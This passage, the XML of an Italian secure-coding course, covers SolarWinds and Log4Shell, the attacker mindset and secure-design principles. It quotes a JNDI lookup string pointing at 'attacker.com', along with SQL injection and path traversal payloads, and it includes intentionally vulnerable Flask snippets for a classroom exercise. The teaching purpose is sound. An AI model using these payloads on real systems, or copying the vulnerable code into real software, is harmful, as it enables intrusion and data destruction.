        <w:t xml:space="preserve">: gli aggiornamenti di SolarWinds Orion (software di monitoraggio rete usato da migliaia di aziende e agenzie USA) erano stati compromessi. ~18000 organizzazioni hanno installato un aggiornamento legittimamente firmato che però conteneva una backdoor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Come è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l’attaccante (gruppo APT, ritenuto russo) si è infiltrato nel build server di SolarWinds e ha modificato il processo di build per iniettare codice malevolo nel binario, dopo la firma. Tutto era validato e firmato — ma firmato con una pipeline compromessa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa si poteva fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Build reproducibili e isolati.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Hash hash di sorgente confrontati con hash binario.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Detection comportamentale (Orion che faceva richieste DNS strane).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Zero-trust al livello di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“non fidarsi nemmeno del proprio software firmato”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Lezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la firma digitale non è sufficiente se la pipeline che la produce è compromessa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="log4shell-2021-un-log-che-esegue-codice"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 Log4Shell 2021 — un log che esegue codice</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 9 dicembre 2021, viene pubblicato CVE-2021-44228 in Log4j (libreria di logging Java usata praticamente ovunque). CVSS 10.0. Internet va in panico per 2 settimane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Come è successo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Log4j aveva una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“feature”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che permetteva di interpolare stringhe come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">${jndi:ldap://attacker.com/exploit}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nei messaggi di log. Se un attaccante riusciva a far loggare quella stringa al server (es. mettendola nel User-Agent), il server scaricava codice da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e lo eseguiva.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remote Code Execution con un campo User-Agent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Impatto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ~10% di tutti i server enterprise al mondo erano vulnerabili.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa si poteva fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Principio di minima funzionalità: una libreria di logging non dovrebbe interpretare comandi remoti. Mai.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Sandboxing dei processi.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Egress filtering (un server web non dovrebbe scaricare jar arbitrari da Internet).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Risposta rapida: chi aveva SBOM, ha trovato Log4j in 5 minuti. Chi non l’aveva, ha cercato per settimane.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Lezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: meno features = meno superficie di attacco. KISS è un principio di sicurezza.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5 — La mentalità avversaria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 30 minuti.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="X594a9a03696f69f1eeafe19cbf760dd25ad4eaf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Cosa significa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“pensare come un attaccante”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando guardi del codice come sviluppatore, ti chiedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“fa quello che deve fare?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Test funzionali, casi happy path, alcuni edge case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando guardi del codice come attaccante, ti chiedi:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“cosa fa che non dovrebbe fare?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembrano la stessa cosa. Non lo sono.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="esempio-guidato-un-form-di-login"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Esempio guidato — un form di login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"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login():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request.form[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request.form[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User.query.filter_by(username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user.password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password:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        session[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fallito"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401</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sviluppatore (mindset funzionale)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Test 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=mario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password=segreta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ entra ✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Test 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=mario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password=sbagliata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ 401 ✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Test 3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=non_esiste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password=qualunque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→ 401 ✅</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Funziona, va bene.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attaccante (mindset avversariale)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se metto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">username=' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? — SQL Injection (M6.2)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se metto un username molto lungo? — DoS / buffer overflow (in Python no, ma in C sì)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se cambio il metodo HTTP da POST a GET? — Username e password finiscono nell’URL e nei log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se faccio 1 milione di tentativi al secondo? — Brute force, manca rate limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se le password nel DB sono in chiaro? — Data breach catastrofico (M6.4)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se l’errore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Login fallito”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mi dice se l’utente esiste o no (timing attack)? — User enumeration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- E se modifico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">session["user_id"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lato client? — Privilege escalation (M6.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sette domande</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in 2 minuti,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sette potenziali vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. E questo è solo il login.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="esercitazione-di-gruppo-15-min"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Esercitazione di gruppo (15 min)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il docente proietta uno snippet a scelta tra:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Snippet A — endpoint che serve file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"/download"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download():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send_file(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"./uploads/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Snippet B — endpoint che mostra una fattura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"/fattura/&lt;int:id&gt;"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fattura(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Fattura.query.get(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"fattura.html"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, fattura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f)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Snippet C — endpoint di ricerca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"/cerca"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cerca():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f"SELECT * FROM prodotti WHERE nome LIKE '%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%'"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jsonify(db.execute(sql).fetchall())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Consegna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: per ogni snippet,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5 minuti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di brainstorming a coppie.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Cosa farebbe un attaccante?”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Almeno 3 attacchi per snippet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Discussione collettiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(15 min): le coppie espongono. Il docente fa il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“feed”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">facendo domande tipo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“E se l’utente è autenticato, ma non è il proprietario di questa fattura?”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“E se metto come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la stringa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“E se cerco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">'; DROP TABLE prodotti; --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="il-valore-della-mentalità-avversaria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Il valore della mentalità avversaria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">“Il design sicuro non si misura dalla lista di cose che il sistema fa. Si misura dalla lista di cose che il sistema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non lascia fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il resto del corso (M2, M5, M6) ti darà strumenti strutturati per applicare questa mentalità: STRIDE (M5), OWASP Top 10 (M6). Ma il punto di partenza è sempre questa domanda:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cosa fa che non dovrebbe fare?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6 — I 5 principi del Secure Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quanto ci vorrà: 30 minuti.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sono i pilastri che riprenderemo in tutto il corso. Memorizzali.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="least-privilege-minimo-privilegio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Least Privilege — Minimo Privilegio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni componente deve avere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">il minimo privilegio necessario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per fare il suo lavoro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempi positivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- L’utente del DB usato dalla webapp ha solo SELECT/INSERT/UPDATE sulle sue tabelle. Non DROP, non GRANT.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Il container Docker non gira come root.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- L’API key per servizio X ha permessi solo per X, non per tutta l’organizzazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempi negativi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- App Flask che gira come root (mai).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“service”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con permessi DBA full sul DB di produzione.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- API key di Slack con permessi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quando serve solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“scrivi su un canale”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="defense-in-depth-difesa-in-profondità"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Defense in Depth — Difesa in Profondità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mai una difesa sola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Più strati di sicurezza indipendenti, in modo che bucarne uno non comprometta tutto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio positivo (login utente)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Strato 1: TLS (canale cifrato)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Strato 2: rate limiting (max 5 tentativi/min)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Strato 3: bcrypt sulle password (anche se il DB viene rubato, le password non sono utilizzabili subito)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Strato 4: MFA (anche con password rubata, serve secondo fattore)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Strato 5: monitoring (alert su login da paesi inusuali)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bucare uno solo (es. TLS) non basta all’attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio negativo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“abbiamo HTTPS, basta così”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="fail-secure-quando-si-rompe-si-chiude"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.3 Fail Secure — Quando si rompe, si chiude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un componente fallisce, il sistema deve cadere in uno stato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sicuro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non aperto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esempi positivi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Se il check di autorizzazione lancia eccezione → nega l’accesso (default deny).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Se la cifratura fallisce → non salvare in chiaro come fallback.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Se il certificato del server è invalido → blocca, non procedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“per cortesia”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Esempi negativi (Fail Open)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ANTI-PATTERN: fail open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is_authorized(user, resource):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resource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resource  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
